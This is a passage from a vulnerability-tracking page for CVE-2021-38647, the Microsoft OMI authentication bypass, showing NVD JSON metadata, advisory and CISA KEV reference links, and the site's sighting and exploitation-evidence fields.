          "id": "CVE-2021-38647",
          "options": [
            {
              "exploitation": "active"
            },
            {
              "automatable": "yes"
            },
            {
              "technicalImpact": "total"
            }
          ],
          "role": "CISA Coordinator",
          "timestamp": "2025-02-04T14:45:47.017000Z",
          "version": "2.0.3"
        }
      }
    ]
  },
  "published": "2021-09-15T12:15:15.090",
  "references": [
    {
      "source": "secure@microsoft.com",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/164694/Microsoft-OMI-Management-Interface-Authentication-Bypass.html"
    },
    {
      "source": "secure@microsoft.com",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38647"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/164694/Microsoft-OMI-Management-Interface-Authentication-Bypass.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38647"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "US Government Resource"
      ],
      "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-38647"
    }
  ],
  "sourceIdentifier": "secure@microsoft.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-noinfo"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Tags

Taxonomy of the tags.

All sightings related to this event Export sightings related to this event

Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2021-38647 (GCVE-0-2021-38647)

CISA KEV

Known Exploited Vulnerability - GCVE BCP-07 Compliant

Timestamps

Scope

Evidence

Vendor Report Successful Exploitation Confidence: 80% Source: cisa-kev

Details

References

KEVintel KEV

Known Exploited Vulnerability - GCVE BCP-07 Compliant

Timestamps

Scope

Evidence

Public Report Confirmed Compromise Confidence: 70% Source: kevintel

Details

References

Solution

Solution

Solution

Solution

Solution

Solution

Solution

Solution

Tags

Sightings

Nomenclature